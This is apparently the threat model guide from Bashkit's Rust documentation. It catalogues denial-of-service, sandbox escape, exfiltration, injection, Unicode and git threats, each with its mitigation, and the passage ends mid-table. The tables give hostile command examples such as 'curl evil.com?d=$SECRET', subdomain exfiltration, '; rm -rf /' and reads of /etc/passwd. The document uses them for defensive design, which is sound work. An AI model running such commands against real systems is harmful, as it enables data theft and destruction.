Module threat_model

Security threat model guide.

This guide documents security threats addressed by Bashkit and their mitigations. All threats use stable IDs for tracking and code references.

Topics covered:

  • Denial of Service mitigations (TM-DOS-*)
  • Sandbox escape prevention (TM-ESC-*)
  • Information disclosure protection (TM-INF-*)
  • Network security controls (TM-NET-*)
  • Multi-tenant isolation (TM-ISO-*)

Related: ExecutionLimits, FsLimits, NetworkAllowlist

§Threat Model

Bashkit is designed to execute untrusted bash scripts safely in virtual environments. This document describes the security threats we address and how they are mitigated.

§Overview

Bashkit assumes all script input is potentially malicious. The virtual environment prevents:

  • Resource exhaustion (CPU, memory, disk)
  • Sandbox escape (filesystem, process, privilege)
  • Information disclosure (secrets, host info)
  • Network abuse (exfiltration, unauthorized access)

§Threat Categories

§Denial of Service (TM-DOS-*)

Scripts may attempt to exhaust system resources. Bashkit mitigates these attacks through configurable limits.

| Threat | Attack Example | Mitigation | Code Reference / Status |
|---|---|---|---|
| Large input (TM-DOS-001) | 1GB script | max_input_bytes limit | limits.rs |
| Infinite loops (TM-DOS-016) | while true; do :; done | max_loop_iterations | limits.rs |
| Recursion (TM-DOS-020) | f() { f; }; f | max_function_depth | limits.rs |
| Parser depth (TM-DOS-022) | (((((...)))))) nesting | max_ast_depth + hard cap (100) | parser/mod.rs |
| Command sub depth (TM-DOS-021) | $($($($()))) nesting | Inherited depth/fuel from parent | parser/mod.rs |
| Arithmetic depth (TM-DOS-026) | $(((((...)))))) | MAX_ARITHMETIC_DEPTH (50) | interpreter/mod.rs |
| Parser attack (TM-DOS-024) | Malformed input | parser_timeout | limits.rs |
| Filesystem bomb (TM-DOS-007) | Zip bomb extraction | FsLimits | fs/limits.rs |
| Many files (TM-DOS-006) | Create 1M files | max_file_count | fs/limits.rs |
| TOCTOU append (TM-DOS-034) | Concurrent appends bypass limits | Single write lock | OPEN |
| OverlayFs limit gaps (TM-DOS-035-038) | CoW/whiteout/accounting bugs | Combined limit accounting | OPEN |
| Missing validate_path (TM-DOS-039) | VFS methods skip path checks | Add to all methods | OPEN |
| Diff algorithm DoS (TM-DOS-028) | diff on large unrelated files | LCS matrix cap (10M cells) | builtins/diff.rs |
| Arithmetic overflow (TM-DOS-029) | $(( 2 ** -1 )) | Use wrapping arithmetic | OPEN |
| Parser limit bypass (TM-DOS-030) | eval/source ignore limits | Use Parser::with_limits() | OPEN |
| ExtGlob blowup (TM-DOS-031) | +(a\|aa) exponential | Add depth limit | OPEN |

Configuration:

use bashkit::{Bash, ExecutionLimits, FsLimits, InMemoryFs};
use std::sync::Arc;
use std::time::Duration;

let limits = ExecutionLimits::new()
    .max_commands(10_000)
    .max_loop_iterations(10_000)
    .max_function_depth(100)
    .timeout(Duration::from_secs(30))
    .max_input_bytes(10_000_000);  // 10MB

let fs_limits = FsLimits::new()
    .max_total_bytes(100_000_000)  // 100MB
    .max_file_size(10_000_000)     // 10MB per file
    .max_file_count(10_000);

let fs = Arc::new(InMemoryFs::with_limits(fs_limits));
let bash = Bash::builder()
    .limits(limits)
    .fs(fs)
    .build();
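
To make the loop limit concrete, here is a minimal sketch of how an iteration budget such as max_loop_iterations could be enforced. LoopBudget, LimitError, and run_infinite_loop are hypothetical names used only for illustration; Bashkit's real accounting lives in limits.rs and may work differently.

```rust
/// Hypothetical error type; not part of Bashkit's public API.
#[derive(Debug, PartialEq)]
pub enum LimitError {
    LoopIterations { max: u64 },
}

/// Hypothetical counter that is charged once per loop iteration.
pub struct LoopBudget {
    max: u64,
    used: u64,
}

impl LoopBudget {
    pub fn new(max: u64) -> Self {
        Self { max, used: 0 }
    }

    /// Charges one iteration, or fails once the budget is spent.
    pub fn tick(&mut self) -> Result<(), LimitError> {
        if self.used >= self.max {
            return Err(LimitError::LoopIterations { max: self.max });
        }
        self.used += 1;
        Ok(())
    }
}

/// Simulates `while true; do :; done` under a budget.
/// Returns the number of iterations that ran and the error that stopped the loop.
pub fn run_infinite_loop(budget: &mut LoopBudget) -> (u64, LimitError) {
    let mut iterations = 0u64;
    loop {
        if let Err(e) = budget.tick() {
            return (iterations, e);
        }
        iterations += 1; // the loop body (`:`) would execute here
    }
}
```

The design point is that the check happens before each iteration, so a script can never run more iterations than the configured limit, regardless of what the loop body does.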

§Sandbox Escape (TM-ESC-*)

Scripts may attempt to break out of the sandbox to access the host system.

| Threat | Attack Example | Mitigation | Code Reference / Status |
|---|---|---|---|
| Path traversal (TM-ESC-001) | cat /../../../etc/passwd | Path normalization | fs/memory.rs |
| Symlink escape (TM-ESC-002) | ln -s /etc/passwd /tmp/x | Symlinks not followed | fs/memory.rs |
| Shell escape (TM-ESC-005) | exec /bin/bash | Not implemented | Returns exit 127 |
| External commands (TM-ESC-006) | ./malicious | No external exec | Returns exit 127 |
| eval injection (TM-ESC-008) | eval "$input" | Sandboxed eval | Only runs builtins |
| VFS limit bypass (TM-ESC-012) | add_file() skips limits | Restrict API visibility | OPEN |
| Custom builtins lost (TM-ESC-014) | std::mem::take empties builtins | Clone/Arc builtins | OPEN |

Virtual Filesystem:

Bashkit uses an in-memory virtual filesystem by default. Scripts cannot access the real filesystem unless explicitly mounted via MountableFs.

use bashkit::{Bash, InMemoryFs, MountableFs};
use std::sync::Arc;

// Default: fully isolated in-memory filesystem
let bash = Bash::new();

// Custom filesystem with explicit mounts (advanced)
let root = Arc::new(InMemoryFs::new());
let fs = Arc::new(MountableFs::new(root));
// fs.mount("/data", Arc::new(InMemoryFs::new()));  // Mount additional filesystems
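
The path normalization mitigation (TM-ESC-001) can be pictured as a purely lexical pass in which `..` can never climb above the virtual root. The function below is an illustrative sketch under that assumption, not the code in fs/memory.rs; normalize_virtual_path is an assumed name.

```rust
/// Lexically normalizes `path` against the virtual root `/`.
/// Relative input is treated as relative to the root in this sketch.
pub fn normalize_virtual_path(path: &str) -> String {
    let mut parts: Vec<&str> = Vec::new();
    for segment in path.split('/') {
        match segment {
            // Empty segments (from `//`) and `.` do not change the location.
            "" | "." => {}
            // `..` removes the last component; at the root, `pop` is a no-op,
            // so the result can never point above `/`.
            ".." => {
                parts.pop();
            }
            other => parts.push(other),
        }
    }
    format!("/{}", parts.join("/"))
}
```

With this sketch, `/../../../etc/passwd` normalizes to `/etc/passwd`, which is then looked up inside the virtual filesystem rather than on the host.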

§Information Disclosure (TM-INF-*)

Scripts may attempt to leak sensitive information.

| Threat | Attack Example | Mitigation | Code Reference / Status |
|---|---|---|---|
| Env var leak (TM-INF-001) | echo $SECRET | Caller responsibility | See below |
| Host info (TM-INF-005) | hostname | Returns virtual value | builtins/system.rs |
| Network exfil (TM-INF-010) | curl evil.com?d=$SECRET | Network allowlist | network/allowlist.rs |
| Host env via jq (TM-INF-013) | jq env exposes host env | Custom env via $__bashkit_env__ | FIXED |
| Real PID leak (TM-INF-014) | $$ returns real PID | Returns virtual PID (1) | FIXED |
| Error msg info leak (TM-INF-016) | Errors expose host paths/IPs | Sanitize error messages | OPEN |

Caller Responsibility (TM-INF-001):

Do NOT pass sensitive environment variables to untrusted scripts:

use bashkit::Bash;

// UNSAFE - secrets may be leaked
let bash = Bash::builder()
    .env("DATABASE_URL", "postgres://user:pass@host/db")
    .env("API_KEY", "sk-secret-key")
    .build();

// SAFE - only pass non-sensitive variables
let bash = Bash::builder()
    .env("HOME", "/home/user")
    .env("TERM", "xterm")
    .build();

System Information:

System builtins return configurable virtual values, never real host information:

use bashkit::Bash;

let bash = Bash::builder()
    .username("sandbox")         // whoami returns "sandbox"
    .hostname("bashkit-sandbox") // hostname returns "bashkit-sandbox"
    .build();

§Network Security (TM-NET-*)

Network access is disabled by default. When enabled, strict controls apply.

| Threat | Attack Example | Mitigation | Code Reference |
|---|---|---|---|
| Unauthorized access (TM-NET-004) | curl http://internal:8080 | URL allowlist | network/allowlist.rs |
| Large response (TM-NET-008) | 10GB download | Size limit (10MB) | network/client.rs |
| Redirect bypass (TM-NET-011) | Redirect to evil.com | No auto-redirect | network/client.rs |
| Compression bomb (TM-NET-013) | 10KB → 10GB gzip | No auto-decompress | network/client.rs |
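
The response size limit (TM-NET-008) can be illustrated with a bounded read. This is a sketch using only the standard library; read_capped is a hypothetical helper, and the actual logic in network/client.rs may be structured differently.

```rust
use std::io::{self, Read};

/// Reads a body from `reader`, failing if it is larger than `max_bytes`.
pub fn read_capped<R: Read>(reader: R, max_bytes: u64) -> io::Result<Vec<u8>> {
    let mut body = Vec::new();
    // Read at most one byte past the cap, so an oversized body can be told
    // apart from one that is exactly at the cap without buffering all of it.
    reader
        .take(max_bytes.saturating_add(1))
        .read_to_end(&mut body)?;
    if body.len() as u64 > max_bytes {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            "response exceeds size limit",
        ));
    }
    Ok(body)
}
```

Because the reader is wrapped in `take`, memory use stays bounded by the cap even when the remote side streams data indefinitely.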

Network Allowlist:

use bashkit::{Bash, NetworkAllowlist};

// Explicit allowlist - only these URLs can be accessed
let allowlist = NetworkAllowlist::new()
    .allow("https://api.example.com")
    .allow("https://cdn.example.com/assets/");

let bash = Bash::builder()
    .network(allowlist)
    .build();

// Scripts can now use curl/wget, but only to allowed URLs
// curl https://api.example.com/data  → allowed
// curl https://evil.com              → blocked (exit 7)
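
One subtlety of URL allowlists is that a plain string-prefix test is not enough: `https://api.example.com.evil.com` starts with an allowed pattern but points at a different host. The sketch below compares scheme, authority, and path separately. It is an assumption about how such matching could work, not a description of network/allowlist.rs; split_url, path_has_prefix, and url_allowed are hypothetical names, and the parsing is deliberately simplified (no percent-decoding and no `..` resolution).

```rust
struct UrlParts<'a> {
    scheme: &'a str,
    authority: &'a str,
    path: &'a str,
}

/// Splits `scheme://authority/path` without any decoding.
fn split_url(url: &str) -> Option<UrlParts<'_>> {
    let (scheme, rest) = url.split_once("://")?;
    let (authority, path) = match rest.find('/') {
        Some(i) => (&rest[..i], &rest[i..]),
        None => (rest, "/"),
    };
    if scheme.is_empty() || authority.is_empty() {
        return None;
    }
    Some(UrlParts { scheme, authority, path })
}

/// True if `path` equals `prefix` or lies below it on a segment boundary.
fn path_has_prefix(path: &str, prefix: &str) -> bool {
    let trimmed = prefix.trim_end_matches('/');
    match path.strip_prefix(trimmed) {
        Some(rest) => rest.is_empty() || rest.starts_with('/'),
        None => false,
    }
}

/// Checks `url` against a list of allowed URL patterns.
pub fn url_allowed(patterns: &[&str], url: &str) -> bool {
    let Some(target) = split_url(url) else {
        return false;
    };
    for pattern in patterns {
        if let Some(p) = split_url(pattern) {
            if p.scheme.eq_ignore_ascii_case(target.scheme)
                && p.authority.eq_ignore_ascii_case(target.authority)
                && path_has_prefix(target.path, p.path)
            {
                return true;
            }
        }
    }
    false
}
```

Matching the path on segment boundaries means a pattern ending in `/assets/` does not also admit `/assets-private/`.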

Domain Allowlist (TM-NET-015, TM-NET-016):

For simpler domain-level control, allow_domain() permits all traffic to a domain regardless of scheme, port, or path. This is the virtual equivalent of SNI-based egress filtering — the same approach used by production sandbox environments.

use bashkit::{Bash, NetworkAllowlist};

// Domain-level: any scheme, port, or path to these hosts
let allowlist = NetworkAllowlist::new()
    .allow_domain("api.example.com")
    .allow_domain("cdn.example.com");

// Both of these are allowed:
// curl https://api.example.com/v1/data
// curl http://api.example.com:8080/health

Trade-off: domain rules intentionally skip scheme and port enforcement. Use URL patterns (allow()) when you need tighter control. Both can be combined.

No Wildcard Subdomains (TM-NET-017):

Wildcard patterns like *.example.com are not supported. They would enable data exfiltration by encoding secrets in subdomains (curl https://$SECRET.example.com).
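
The following sketch shows why exact host matching blocks the subdomain exfiltration channel described above. host_of and domain_allowed are hypothetical helpers written for this illustration; they are not Bashkit's allow_domain() implementation, and the host extraction is simplified (for example, IPv6 literals are not handled).

```rust
/// Extracts the lowercased host from a URL, ignoring userinfo and port.
pub fn host_of(url: &str) -> Option<String> {
    let (_, rest) = url.split_once("://")?;
    // The authority ends at the first path, query, or fragment delimiter.
    let authority = rest
        .split(|c: char| c == '/' || c == '?' || c == '#')
        .next()?;
    // Drop any `user:pass@` prefix, then any `:port` suffix.
    let host_port = authority.rsplit('@').next()?;
    let host = host_port.split(':').next()?;
    if host.is_empty() {
        None
    } else {
        Some(host.to_ascii_lowercase())
    }
}

/// Allows a URL only if its host equals an allowed domain exactly.
pub fn domain_allowed(domains: &[&str], url: &str) -> bool {
    match host_of(url) {
        Some(host) => domains.iter().any(|d| d.eq_ignore_ascii_case(&host)),
        None => false,
    }
}
```

Under exact matching, a request to `https://s3cr3t.api.example.com/` is rejected even though `api.example.com` is allowed, so a secret cannot be smuggled out in a subdomain label.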

§Injection Attacks (TM-INJ-*)

| Threat | Attack Example | Mitigation |
|---|---|---|
| Command injection (TM-INJ-001) | $input containing ; rm -rf / | Variables expand to strings only |
| Path injection (TM-INJ-005) | ../../../../etc/passwd | Path normalization |
| Terminal escapes (TM-INJ-008) | ANSI sequences in output | Caller should sanitize |
| Internal var injection (TM-INJ-009) | Set _READONLY_X="" | Isolate internal namespace |
| Tar path traversal (TM-INJ-010) | tar -xf with ../ entries | Validate extract paths |
| Cyclic nameref (TM-INJ-011) | Cyclic refs resolve silently | Detect cycle, error |

Variable Expansion:

Variables expand to literal strings, not re-parsed as commands:

# If user_input contains "; rm -rf /"
user_input="; rm -rf /"
echo $user_input
# Output: ; rm -rf /   (printed as a literal string, NOT executed)
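
The reason expansion is safe is ordering: the script is split into commands before variables are substituted, so an expanded value can no longer introduce a new command separator. The toy model below demonstrates only that ordering. parse_then_expand and expand_word are hypothetical, and the sketch omits quoting, word splitting, and globbing, all of which a real shell performs.

```rust
use std::collections::HashMap;

/// Expands a word of the form `$name`; other words are returned unchanged.
fn expand_word(word: &str, vars: &HashMap<String, String>) -> String {
    match word.strip_prefix('$') {
        Some(name) => vars.get(name).cloned().unwrap_or_default(),
        None => word.to_string(),
    }
}

/// Step 1: split the script text into commands on `;`.
/// Step 2: expand variables inside each already-parsed command.
/// Expanded text is never fed back into step 1.
pub fn parse_then_expand(script: &str, vars: &HashMap<String, String>) -> Vec<Vec<String>> {
    script
        .split(';')
        .map(|cmd| {
            cmd.split_whitespace()
                .map(|word| expand_word(word, vars))
                .collect::<Vec<String>>()
        })
        .filter(|argv| !argv.is_empty())
        .collect()
}
```

In this model, `echo $user_input` with `user_input="; rm -rf /"` yields exactly one command whose argument is the literal text, whereas writing `echo hi; rm -rf /` directly in the script yields two.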

§Multi-Tenant Isolation (TM-ISO-*)

Each Bash instance is fully isolated. For multi-tenant environments, create separate instances per tenant:

use bashkit::{Bash, InMemoryFs};
use std::sync::Arc;

// Each tenant gets completely isolated instance
let tenant_a = Bash::builder()
    .fs(Arc::new(InMemoryFs::new()))  // Separate filesystem
    .build();

let tenant_b = Bash::builder()
    .fs(Arc::new(InMemoryFs::new()))  // Different filesystem
    .build();

// tenant_a cannot access tenant_b's files or state

§Internal Error Handling (TM-INT-*)

Bashkit is designed to never crash, even when processing malicious or malformed input. All unexpected errors are caught and converted to safe, human-readable messages.

| Threat | Attack Example | Mitigation | Code Reference |
|---|---|---|---|
| Builtin panic (TM-INT-001) | Trigger panic in builtin | catch_unwind wrapper | interpreter/mod.rs |
| Info leak in panic (TM-INT-002) | Panic exposes secrets | Sanitized error messages | interpreter/mod.rs |
| Date format crash (TM-INT-003) | Invalid strftime: +%Q | Pre-validation | builtins/date.rs |

Panic Recovery:

All builtins, bundled and custom alike, are wrapped with panic catching:

  • If a builtin panics, the script continues with a sanitized error.
  • The panic message is NOT exposed, because it may contain sensitive data.
  • Output: "bash: <command>: builtin failed unexpectedly"
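
A wrapper of this kind can be sketched with std::panic::catch_unwind. BuiltinOutput and run_builtin_guarded are hypothetical names, and the exit code of 1 is an assumption; only the error text is taken from the description above.

```rust
use std::panic::{self, AssertUnwindSafe};

/// Hypothetical result type for a builtin invocation.
pub struct BuiltinOutput {
    pub stdout: String,
    pub stderr: String,
    pub exit_code: i32,
}

/// Runs `builtin`, converting any panic into a sanitized error result.
pub fn run_builtin_guarded<F>(name: &str, builtin: F) -> BuiltinOutput
where
    F: FnOnce() -> BuiltinOutput,
{
    match panic::catch_unwind(AssertUnwindSafe(builtin)) {
        Ok(output) => output,
        // The panic payload is dropped on purpose: it may contain secrets.
        Err(_payload) => BuiltinOutput {
            stdout: String::new(),
            stderr: format!("bash: {name}: builtin failed unexpectedly\n"),
            exit_code: 1, // assumed value for this sketch
        },
    }
}
```

Note that Rust's default panic hook still prints the panic message to the host process's stderr, which is separate from the output returned to the script. Also, catch_unwind only works when the binary is built with unwinding panics, not with panic = "abort".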

Error Message Safety:

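Error messages are designed never to expose the following (TM-INF-016 tracks remaining cases where host paths or IPs can still appear):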

  • Stack traces or call stacks
  • Memory addresses
  • Real filesystem paths (only virtual paths)
  • Panic messages that may contain secrets

§Logging Security (TM-LOG-*)

When the logging feature is enabled, Bashkit emits structured logs. Security features prevent sensitive data leakage:

| Threat | Attack Example | Mitigation |
|---|---|---|
| Secrets in logs (TM-LOG-001) | Log $PASSWORD value | Env var redaction |
| Script leak (TM-LOG-002) | Log script with embedded secrets | Script content disabled by default |
| URL credentials (TM-LOG-003) | Log https://user:pass@host | URL credential redaction |
| API key leak (TM-LOG-004) | Log JWT or API key values | Entropy-based detection |
| Log injection (TM-LOG-005) | Script with \n[ERROR] | Newline escaping |

Logging Configuration:

use bashkit::{Bash, LogConfig};

// Default: secure (redaction enabled, script content hidden)
let bash = Bash::builder()
    .log_config(LogConfig::new())
    .build();

// Add custom redaction patterns
let bash = Bash::builder()
    .log_config(LogConfig::new()
        .redact_env("MY_CUSTOM_SECRET"))
    .build();

Warning: Do not use LogConfig::unsafe_disable_redaction() or LogConfig::unsafe_log_scripts() in production.
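
Two of the logging mitigations, URL credential redaction (TM-LOG-003) and newline escaping (TM-LOG-005), are simple enough to sketch. The functions below are illustrative only; redact_url_credentials, escape_log_value, and the `[REDACTED]` marker are assumptions, not the behavior of LogConfig.

```rust
/// Replaces `user:pass@` in a URL's authority with `[REDACTED]@`.
pub fn redact_url_credentials(url: &str) -> String {
    let Some((scheme, rest)) = url.split_once("://") else {
        return url.to_string();
    };
    // The authority ends at the first path, query, or fragment delimiter.
    let authority_end = rest
        .find(|c: char| c == '/' || c == '?' || c == '#')
        .unwrap_or(rest.len());
    let (authority, tail) = rest.split_at(authority_end);
    match authority.rfind('@') {
        Some(at) => format!("{scheme}://[REDACTED]@{}{tail}", &authority[at + 1..]),
        None => url.to_string(),
    }
}

/// Escapes line breaks so one logged value cannot forge extra log lines.
pub fn escape_log_value(value: &str) -> String {
    let mut out = String::with_capacity(value.len());
    for ch in value.chars() {
        match ch {
            '\n' => out.push_str("\\n"),
            '\r' => out.push_str("\\r"),
            other => out.push(other),
        }
    }
    out
}
```

Only an `@` inside the authority is treated as a credential separator, so a path such as `/a@b` is left untouched.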

§Parser Depth Protection

The parser includes multiple layers of depth protection to prevent stack overflow attacks:

  1. Configurable depth limit (max_ast_depth, default 100): Controls maximum nesting of compound commands (if/for/while/case/subshell).

  2. Hard cap (HARD_MAX_AST_DEPTH = 100): Even if the caller configures a higher max_ast_depth, the parser clamps it to 100. This prevents misconfiguration from causing stack overflow.

  3. Child parser inheritance (TM-DOS-021): When parsing $(...) or <(...), the child parser inherits the remaining depth budget and fuel from the parent. This prevents attackers from bypassing depth limits through nested substitutions.

  4. Arithmetic depth limit (TM-DOS-026): The arithmetic evaluator ($((expr))) has its own depth limit (MAX_ARITHMETIC_DEPTH = 50) to prevent stack overflow from deeply nested parenthesized expressions.

  5. Parser fuel (max_parser_operations, default 100K): Independent of depth, limits total parser work to prevent CPU exhaustion.
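
The layers above can be sketched with a toy recursive parser for nested parentheses. Only HARD_MAX_AST_DEPTH and its value of 100 come from this guide; Budget, ParseError, parse_group, and parse_parens are hypothetical, and the real parser in parser/mod.rs handles the full grammar. Child inheritance is modeled by passing the same budget to every nested parse rather than creating a fresh one.

```rust
pub const HARD_MAX_AST_DEPTH: usize = 100;

#[derive(Debug, PartialEq)]
pub enum ParseError {
    TooDeep,
    OutOfFuel,
    Unbalanced,
}

/// Remaining nesting depth and remaining parser work ("fuel").
pub struct Budget {
    pub depth_remaining: usize,
    pub fuel: usize,
}

impl Budget {
    /// The configured depth is clamped to the hard cap.
    pub fn new(max_ast_depth: usize, max_parser_operations: usize) -> Self {
        Self {
            depth_remaining: max_ast_depth.min(HARD_MAX_AST_DEPTH),
            fuel: max_parser_operations,
        }
    }
}

/// Parses one `( ... )` group starting at `pos`; returns its nesting depth.
fn parse_group(input: &[u8], pos: &mut usize, budget: &mut Budget) -> Result<usize, ParseError> {
    budget.fuel = budget.fuel.checked_sub(1).ok_or(ParseError::OutOfFuel)?;
    budget.depth_remaining = budget
        .depth_remaining
        .checked_sub(1)
        .ok_or(ParseError::TooDeep)?;
    *pos += 1; // consume '('
    let mut deepest = 0usize;
    while input.get(*pos) == Some(&b'(') {
        deepest = deepest.max(parse_group(input, pos, budget)?);
    }
    if input.get(*pos) != Some(&b')') {
        return Err(ParseError::Unbalanced);
    }
    *pos += 1; // consume ')'
    budget.depth_remaining += 1; // leaving this level restores one unit of depth
    Ok(deepest + 1)
}

/// Parses a sequence of groups and returns the deepest nesting seen.
pub fn parse_parens(input: &str, budget: &mut Budget) -> Result<usize, ParseError> {
    let bytes = input.as_bytes();
    let mut pos = 0usize;
    let mut deepest = 0usize;
    while pos < bytes.len() {
        if bytes[pos] != b'(' {
            return Err(ParseError::Unbalanced);
        }
        deepest = deepest.max(parse_group(bytes, &mut pos, budget)?);
    }
    Ok(deepest)
}
```

Depth is restored on the way out of each group while fuel is never refunded, which is why the two limits catch different attacks: deep nesting versus sheer volume of input.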

§Python / Monty Security (TM-PY-*)

The python/python3 builtins embed the Monty Python interpreter with VFS bridging. Python pathlib.Path operations are bridged to Bashkit’s virtual filesystem.

| Threat | Attack Example | Mitigation |
|---|---|---|
| Infinite loop (TM-PY-001) | while True: pass | Monty time limit (30s) + allocation cap |
| Memory exhaustion (TM-PY-002) | Large allocation | Monty max_memory (64MB) + max_allocations (1M) |
| Stack overflow (TM-PY-003) | Deep recursion | Monty max_recursion (200) |
| Shell escape (TM-PY-004) | os.system() | Monty has no os.system/subprocess |
| Real FS access (TM-PY-005) | open() | Monty has no open() builtin |
| Real FS read (TM-PY-015) | Path.read_text() | VFS bridge reads only from BashKit VFS |
| Real FS write (TM-PY-016) | Path.write_text() | VFS bridge writes only to BashKit VFS |
| Path traversal (TM-PY-017) | ../../etc/passwd | VFS path normalization |
| Network access (TM-PY-020) | Socket/HTTP | Monty has no socket/network module |
| VM crash (TM-PY-022) | Malformed input | Parser depth limit + resource limits |
| Shell injection (TM-PY-023) | deepagents.py f-strings | Use shlex.quote() |
| Heredoc escape (TM-PY-024) | Content contains delimiter | Random delimiter |
| GIL deadlock (TM-PY-025) | execute_sync holds GIL | py.allow_threads() |
| Config lost on reset (TM-PY-026) | reset() drops limits | Preserve config |
| JSON recursion (TM-PY-027) | Nested dicts overflow stack | Add depth limit |

Architecture:

Python code → Monty VM → OsCall pause → BashKit VFS bridge → resume

Monty runs directly in the host process. Resource limits (memory, allocations, time, recursion) are enforced by Monty’s own runtime. All VFS operations are bridged through the host process — Python code never touches the real filesystem.

§Git Security (TM-GIT-*)

Optional virtual git operations via the git feature. All operations are confined to the virtual filesystem.

| Threat | Attack Example | Mitigation | Status |
|---|---|---|---|
| Host identity leak (TM-GIT-002) | Commit reveals real name/email | Configurable virtual identity | MITIGATED |
| Host git config (TM-GIT-003) | Read ~/.gitconfig | No host filesystem access | MITIGATED |
| Credential theft (TM-GIT-004) | Access credential store | No host filesystem access | MITIGATED |
| Repository escape (TM-GIT-005) | Clone outside VFS | All paths in VFS | MITIGATED |
| Many git objects (TM-GIT-007) | Millions of objects | max_file_count FS limit | MITIGATED |
| Deep history (TM-GIT-008) | Very long commit log | Log limit parameter | MITIGATED |
| Large pack files (TM-GIT-009) | Huge .git/objects/pack | max_file_size FS limit | MITIGATED |
| Branch name injection (TM-GIT-014) | git branch ../../config | Validate branch names | OPEN |
| Unauthorized clone (TM-GIT-001) | git clone evil.com | Remote URL allowlist | PLANNED (Phase 2) |
| Push to unauthorized (TM-GIT-010) | git push evil.com | Remote URL allowlist | PLANNED (Phase 2) |

Virtual Identity:

use bashkit::Bash;

let bash = Bash::builder()
    .git_author("sandbox", "sandbox@example.com")
    .build();
// Commits use virtual identity, never host ~/.gitconfig

§Unicode Security (TM-UNI-*)

Unicode input from untrusted scripts creates attack surface across the parser, builtins, and virtual filesystem. AI agents frequently generate multi-byte Unicode (box-drawing, emoji, CJK) that exercises these code paths.

Byte-Boundary Safety (TM-UNI-001/002/015/016/017):

Several builtins mix byte offsets with character indices, which causes panics on multi-byte input. Each panic is caught by catch_unwind (TM-INT-001), so the process does not crash, but the affected builtin still fails silently.

| Threat | Attack Example | Mitigation | Status |
|---|---|---|---|
| Awk byte-boundary panic (TM-UNI-001) | Multi-byte chars in awk input | catch_unwind catches panic | PARTIAL |
| Sed byte-boundary panic (TM-UNI-002) | Box-drawing chars in sed pattern | catch_unwind catches panic | PARTIAL |
| Expr substr panic (TM-UNI-015) | expr substr "café" 4 1 | catch_unwind catches panic | PARTIAL |
| Printf precision panic (TM-UNI-016) | printf "%.1s" "é" | catch_unwind catches panic | PARTIAL |
| Cut/tr byte-level parsing (TM-UNI-017) | tr 'é' 'e' (multi-byte in char set) | catch_unwind catches; silent data loss | PARTIAL |
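
The underlying bug class is slicing a `&str` at a byte offset that falls inside a multi-byte character, which panics in Rust. The sketch below shows character-based alternatives for the `expr substr` and `printf` precision cases. substr_chars and truncate_chars are hypothetical helpers, not the planned Bashkit fixes, and they make no claim about matching GNU or bash semantics in every edge case.

```rust
/// 1-based, character-indexed substring in the style of
/// `expr substr STRING POS LEN`. A position of 0 yields an empty string here.
pub fn substr_chars(s: &str, pos: usize, len: usize) -> String {
    if pos == 0 {
        return String::new();
    }
    s.chars().skip(pos - 1).take(len).collect()
}

/// Truncates `s` to at most `max_chars` characters without splitting one.
pub fn truncate_chars(s: &str, max_chars: usize) -> &str {
    // `char_indices` yields byte offsets that are always valid boundaries.
    match s.char_indices().nth(max_chars) {
        Some((byte_idx, _)) => &s[..byte_idx],
        None => s,
    }
}
```

In "café" the `é` occupies bytes 3 and 4, so the byte range 3..4 is not a valid slice, while the character-based helpers return `é` for position 4, length 1.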

Additional Byte/Char Confusion:

| Threat | Attack Example | Mitigation | Status |
|---|---|---|---|
| Interpreter arithmetic (TM-UNI-018) | Multi-byte before = in arithmetic | Wrong operator detection; no panic | PARTIAL |
| Network allowlist (TM-UNI-019) | Multi-byte in allowlist URL path | Wrong path boundary check | PARTIAL |
| Zero-width in filenames (TM-UNI-003) | Invisible chars create confusable names | Path validation (planned) | UNMITIGATED |
| Homoglyph confusion (TM-UNI-006) | Cyrillic ‘а’ vs Latin ‘a’ in filenames | Accepted risk | ACCEPTED |
| Normalization bypass (TM-UNI-008) | NFC vs NFD create distinct files | Matches Linux FS behavior | ACCEPTED |
| Bidi in script source (TM-UNI-014) | RTL overrides hide malicious code | Scripts untrusted by design | ACCEPTED |

Safe Components (confirmed by full codebase audit):

  • Lexer: Chars iterator with ch.len_utf8() tracking
  • wc: Correct .len() vs .chars().count() usage
  • grep/jq: Delegate to Unicode-aware regex/jaq crates
  • sort/uniq: String comparison, no byte indexing
  • logging: Uses is_char_boundary() correctly
  • python: Shebang strip via find('\n') — ASCII delimiter, safe
  • Python bindings (bashkit-python): PyO3 String extraction, no manual byte/char ops
  • eval harness: chars().take(), from_utf8_lossy() — all safe patterns
  • curl/bc/export/date/comm/echo/archive/base64: All .find() use ASCII delimiters only
  • scripted_tool: No byte/char patterns

Path Validation:

Filenames are validated by find_unsafe_path_char() which rejects:

  • ASCII control characters (U+0000-U+001F, U+007F)
  • C1 control characters (U+0080-U+009F)
  • Bidi override characters (U+202A-U+202E, U+2066-U+2069)

Normal Unicode (accented, CJK, emoji) is allowed in filenames and script content.
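
The rejection rules listed above translate directly into character ranges. The function name find_unsafe_path_char comes from this guide, but the signature and body below are assumptions made for illustration and may not match the real implementation.

```rust
/// Returns the first character in `path` that falls in a rejected range,
/// or `None` if the path contains no such character.
pub fn find_unsafe_path_char(path: &str) -> Option<char> {
    path.chars().find(|&c| {
        matches!(
            c,
            '\u{0000}'..='\u{001F}'       // ASCII control characters
                | '\u{007F}'              // DEL
                | '\u{0080}'..='\u{009F}' // C1 control characters
                | '\u{202A}'..='\u{202E}' // bidi embeddings and overrides
                | '\u{2066}'..='\u{2069}' // bidi isolates
        )
    })
}
```

Zero-width characters such as U+200B are outside these ranges, so this check accepts them, consistent with TM-UNI-003 being listed as UNMITIGATED.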

Caller Responsibility:

  • Strip zero-width/invisible characters from filenames before displaying to users
  • Apply confusable-character detection (UTS #39) if showing filenames to humans
  • Strip bidi overrides from script source before displaying to code reviewers
  • Be aware that expr/printf/cut/tr may fail on non-ASCII input until fixes land
  • Use ASCII in network allowlist URL patterns until byte/char fix lands

§Security Testing

Bashkit includes comprehensive security tests:

  • Threat Model Tests: tests/threat_model_tests.rs - 117 tests
  • Unicode Security Tests: tests/unicode_security_tests.rs - TM-UNI-* tests
  • Nesting Depth Tests: 18 tests covering positive, negative, misconfiguration, and regression scenarios for parser depth attacks
  • Fail-Point Tests: tests/security_failpoint_tests.rs - 14 tests
  • Network Security: tests/network_security_tests.rs - 53 tests
  • Builtin Error Security: tests/builtin_error_security_tests.rs - 39 tests
  • Logging Security: tests/logging_security_tests.rs - 26 tests
  • Git Security: tests/git_security_tests.rs + tests/git_remote_security_tests.rs
  • Fuzz Testing: fuzz/ - Parser and lexer fuzzing

§Reporting Security Issues

If you discover a security vulnerability, please report it privately via GitHub Security Advisories rather than opening a public issue.

§Threat ID Reference

All threats use stable IDs in the format TM-<CATEGORY>-<NUMBER>:

| Prefix | Category |
|---|---|
